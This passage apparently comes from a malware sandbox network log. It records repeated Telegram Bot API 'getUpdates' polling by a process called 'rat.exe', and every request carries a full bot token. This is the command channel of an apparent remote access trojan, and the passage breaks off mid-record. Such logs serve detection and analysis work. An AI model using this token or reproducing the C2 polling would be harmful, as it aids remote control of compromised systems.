                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:45 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:46 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:49 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:51 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:52 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:53 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:54 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:55 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:56 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506611
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506611 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:58 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506612
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506612 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:59 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506613
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506613 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506614
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506614 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506615
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506615 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:02 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506616
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506616 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:03 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506617
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506617 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506618
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506618 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506619
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506619 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506620
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506620 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:07 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506621
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506621 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:08 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506622
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506622 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:10 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506623
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506623 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:11 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506624
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506624 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:12 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506625
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506625 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506626
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506626 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506627
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506627 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:15 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506628
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506628 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:16 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506629
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506629 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:17 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506630
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506630 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:18 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506631
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506631 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:19 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506632
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506632 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:20 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506633
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506633 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
